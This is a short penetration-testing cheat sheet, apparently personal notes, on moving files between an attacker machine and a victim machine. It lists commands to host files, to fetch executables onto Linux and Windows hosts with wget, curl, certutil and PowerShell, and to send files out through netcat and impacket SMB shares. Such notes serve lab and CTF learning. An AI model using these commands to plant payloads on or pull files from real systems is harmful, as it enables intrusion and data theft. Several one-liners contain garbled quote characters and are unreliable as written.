Shell File Transfer
- Host Files:
python3 -m http.server [PORT]
python -m SimpleHTTPServer [PORT]
sudo service apache2 start
Apache web server, requires to place files in the /var/www/html/ directory
To see the logs: watch -n 1 tail /var/log/apache2/access.log
Nginx web server, requires to place files in or /usr/share/nginx/html or /var/www/html
php -S 0.0.0.0:PORT
nc -nv IP_ADDR 443 < file
*If we want to share a whole directory we can compress it with : tar -czvf {name of the compressed file we want to create}.tar.gz {Folder to compress} (Make sure you have tar in the victim machine), then to decompress it: tar -xf {compressed file}
- Download Files:
Linux:
wget http://ip-addr:port/file [-o output_file]
curl http://ip-addr:port/file -o output_file
nc -nv IP_ADDR 443 > file
php -r āfile_put_contents(āoutput_fileā, fopen(āhttp://ip-addr:port/fileā, ārā));ā
python -c āfrom urllib import urlretrieve; urlretrieve(āhttp://ip-addr:port/fileā, āoutput_fileā)ā;
python3 -c āfrom urllib.request import urlretrieve; urlretrieve(āhttp://ip-addr:port/fileā, āoutput_fileā)ā
Windows:
certutil.exe -f -urlcache -split http://{My_IP}:{PORT}/example.exe output.exe
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{My_IP}:{PORT}/file.exe','C:\Users\user\Desktop\file.exe')"
powershell Invoke-WebRequest "http://{My_IP}:{PORT}/file.exe" -OutFile "C:\Users\user\Desktop\file.exe"
powershell wget http://example.com/file.exe -OutFile file.exe
- SMB Sharing
Attacker:
impacket-smbserver -smb2support -username guest -password guest share /{folder}
impacket-smbserver shared `pwd`
impacket-smbserver smbfolder $(pwd) -smb2support
Victim:
Through desktop
We can download and send files typing in the file explorer: \\{Attacker_IP}\smbfolder
Through console:
To send files:
net use x: \\{My_IP}\share /user:guest guest
cmd /c "copy {file} X:\"
To get files:
copy \\{My_IP}\smbfolder\file output_file
Last updated
